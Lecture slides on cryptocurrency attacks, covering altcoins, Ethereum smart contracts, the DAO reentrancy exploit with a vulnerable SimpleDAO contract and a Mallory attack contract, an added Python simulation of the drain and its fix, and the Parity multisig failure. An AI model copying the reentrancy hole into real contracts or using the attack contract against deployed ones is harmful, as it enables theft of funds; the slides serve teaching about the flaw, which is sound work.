More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/ https://hackernoon.com/what-caused-the-latest-100-million-ethereum-bug-and-a-detection-tool-for-similar-bugs-7b80f8ab7279
Last Class • Majority attacks • Block withholding attacks • Spam attacks • Sybil attacks • Blacklisting • Fungibility • Money laundering
Last Class • With the rise of 51% attacks: • why? to what end? • when will this stop? • What are the points of centralization in this network? • Is this inevitable?
Cryptocurrencies • First altcoin: Bitcoin testnet • Second altcoin: Namecoin (DNS system) • … • over two thousand altcoins/tokens/etc.
But… why? • Improvements to Bitcoin • Alternatives to Bitcoin • Other functionality complementary to Bitcoin • Make money for founders
But… how? • Altcoins: have their own blockchain • Tokens: built on top of cryptocurrencies
Alternative Proof of Work Mechanisms • Litecoin: scrypt • Cuckoo Cycle • etc.
Alternative functionality • NameCoin: DNS system • Ethereum: Turing complete • ZCash/Monero/others: “Private”
Namecoin • “completes” Zooko’s Triangle • Blockchain-based DNS • First fork of Bitcoin • Merge mined with Bitcoin: • same hash function
Ethereum • Currently the second most popular cryptocurrency • First proposed as a system built on top of Bitcoin • Started to create Turing-complete money contracts: “smart contracts” • Ether: currency which is input/output to contracts • Gas: execution cost of instructions
Smart Contracts • Run on blockchain and executed by all nodes • Created by posting a transaction • Identified by address • Can hold, receive, and send money • Once deployed, cannot be changed
Ethereum uses • DApps • Distributed applications • CryptoKitties! • Ponzi schemes! • Tokens • https://coinmarketcap.com/tokens/views/all/
The DAO • Crowdfunding platform • Envisioned as a leaderless organization • Anybody could hold DAO tokens • DAO creators together agreed on rules • Raised 12.7M Ether ($150M)
Simplified DAO • Solidity: • high-level programming language to write smart contracts with • python-ish • Enter contract: donate • Exit contract: withdraw • Fallback option:
Simplified DAO
contract SimpleDAO {
  mapping (address => uint) public credit;
  // donate: credit the given address with the ether sent along with the call
  function donate(address to) { credit[to] += msg.value; }
  function queryCredit(address to) returns (uint) { return credit[to]; }
  // withdraw: the external call happens BEFORE the credit is reduced
  function withdraw(uint amount) {
    if (credit[msg.sender] >= amount) {
      msg.sender.call.value(amount)();   // hands control to msg.sender's fallback
      credit[msg.sender] -= amount;      // too late if the fallback re-entered withdraw
    }
  }
}
Attack
contract Mallory {
  SimpleDAO public dao = SimpleDAO(0x354...);   // address of the target DAO (elided on the slide)
  address owner;
  function Mallory() { owner = msg.sender; }
  // fallback: runs whenever Mallory receives ether, i.e. in the middle of SimpleDAO.withdraw
  function() { dao.withdraw(dao.queryCredit(this)); }
  function getJackpot() { owner.send(this.balance); }
}
Attack (SimpleDAO.donate / Mallory) • Step 1: Attacker donates ether for Mallory. This triggers Mallory’s fallback.
Attack (Mallory fallback) • Step 2: Mallory’s fallback calls the withdraw function.
Attack (SimpleDAO.withdraw) • Step 3: The withdraw function then invokes Mallory’s default again via call.
Attack (Mallory fallback) • Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw!
Attack • We can repeat ad nauseam until: • contract gas is exhausted OR • balance of DAO is zero.
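Added example, not code from the slides or the survey it cites: a Python model of the SimpleDAO/Mallory reentrancy above, with the two termination conditions (a depth limit standing in for gas exhaustion, and the DAO balance reaching zero) and a safe=True variant that reorders withdraw so the credit is updated before the external call. Class names, amounts and the max_depth parameter are constructed for the model.

```python
# Added model of the SimpleDAO reentrancy (not the slides' own code). Dao.withdraw
# models msg.sender.call.value(amount)() as a direct call into the recipient's fallback
# before credit is updated; safe=True applies checks-effects-interactions ordering.
class Dao:
    def __init__(self, safe=False):
        self.credit, self.balance, self.safe = {}, 0, safe

    def donate(self, to, value):
        self.credit[to] = self.credit.get(to, 0) + value
        self.balance += value

    def query_credit(self, who):
        return self.credit.get(who, 0)

    def withdraw(self, sender, amount):
        if self.query_credit(sender) >= amount:
            if self.safe:
                self.credit[sender] -= amount  # effect BEFORE the external call (fix)
            self.balance -= amount
            sender.fallback(self, amount)      # external call: recipient's code runs here
            if not self.safe:
                self.credit[sender] -= amount  # effect AFTER the call: the DAO bug

class Honest:
    """Ordinary depositor; the fallback just accepts the payment."""
    received = 0

    def fallback(self, dao, amount):
        self.received += amount

class Mallory(Honest):
    """Attacker contract: the fallback re-enters dao.withdraw while the outer call is suspended."""
    def __init__(self, max_depth):
        self.depth, self.max_depth = 0, max_depth  # max_depth stands in for the gas limit

    def fallback(self, dao, amount):
        self.received += amount
        credit = dao.query_credit(self)        # still unchanged in the vulnerable DAO
        if self.depth < self.max_depth and 0 < credit <= dao.balance:
            self.depth += 1
            dao.withdraw(self, credit)         # re-entrant call (Steps 3 and 4)
            self.depth -= 1

def run_attack(safe, max_depth=50):
    """Returns (amount Mallory received, DAO balance left, Mallory's recorded credit)."""
    dao, alice, mallory = Dao(safe), Honest(), Mallory(max_depth)
    dao.donate(alice, 100)   # other depositors' money held by the DAO (constructed units)
    dao.donate(mallory, 10)  # Step 1: attacker funds Mallory's credit
    dao.withdraw(mallory, dao.query_credit(mallory))  # Step 2: first withdraw
    return mallory.received, dao.balance, dao.query_credit(mallory)
```

With safe=False the whole 110 is drained and Mallory's credit ends at -100 (in Solidity the uint would underflow instead); with safe=True Mallory gets only its own 10 because the re-entered withdraw sees credit 0.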
But wait! 7 days before drain started
But wait! 5 days before drain started
But wait! • Code was attacked after it was patched. • But how can that be? • Remember: once deployed, cannot change
Ethereum Price Shock
Forks • Fork: update in software • Hard Fork • requires software update; old version incompatible • Soft Fork • old version compatible with new software
Forks
What to do next with Ethereum? • Nothing • Gas limit • Ban spam addresses • Soft Fork • Hard Fork
What happened next https://www.ofnumbers.com/2016/07/28/ethereum-core-and-ethereum-classic-for-dummies/
Parity Multisig • Ethereum Wallet • One person “killing” a wallet killed every wallet that relied on the contract
Questions • If we can’t secure code in a normal case, how will we be able to secure it on a blockchain? • Do new blockchains create decentralization or centralization pressures? How?
Recommend
More recommend